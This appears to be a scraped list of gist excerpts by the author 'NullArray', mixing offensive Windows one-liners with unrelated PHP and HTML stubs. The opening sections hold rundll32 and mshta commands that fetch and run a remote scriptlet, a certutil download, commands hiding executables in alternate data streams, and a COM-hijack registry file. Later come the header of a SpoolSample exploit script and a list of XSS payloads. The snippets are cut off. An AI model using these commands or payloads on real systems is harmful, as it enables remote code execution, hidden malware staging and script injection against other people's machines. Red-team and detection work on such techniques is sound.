NullArray

xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();

NullArray

#Add content to ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat

NullArray

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]

NullArray

#!/usr/bin/env python

# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/

import os
import sys
import argparse
import binascii
import ConfigParser

NullArray

XSS Payloads, simple overview

Basic payload

<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>

Img payload

NullArray

#!/bin/bash
#____   ____             __
#\   \ /   /____   _____/  |_  ___________
# \   Y   // __ \_/ ___\   __\/  _ \_  __ \
#  \     /\  ___/\  \___|  | (  <_> )  | \/
#   \___/  \___  >\___  >__|  \____/|__|
#              \/     \/
#--Licensed under GNU GPL 3
#----Authored by Vector/NullArray
##############################################

NullArray

<?php
/**
 * File Manager Script
 */

// Default language ('en' and other from 'filemanager-l10n.php')
$lang = 'en';

// Auth with login/password (set true/false to enable/disable it)
$use_auth = true;

NullArray

<?php
// Configuration
$title = 'Internal Image Hosting Script';
$filedir = 'up'; // uploaded image dir
$maxsize = 5242880; //max size in bytes
$allowedExts = array('png', 'jpg', 'jpeg', 'gif');
$allowedMime = array('image/png', 'image/jpeg', 'image/pjpeg', 'image/gif');
$baseurl = $_SERVER['HTTP_HOST'].dirname($_SERVER['REQUEST_URI']).'/'.$filedir;

function compressImage($source_url, $destination_url, $quality) {

NullArray

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Formalize CSS</title>
</head>
<body>
<div id="wrapper">
  <h1>
    Example of all form elements

NullArray

<?php
/*
 * Filename: SimpleAuth.php
 * Version: 1.0
 * Author: Heiswayi Nrird
 * Dscription: Simple PHP script to protect any PHP page using session
 * Website: https://heiswayi.nrird.com
 *
 * HOW TO USE
 * ==========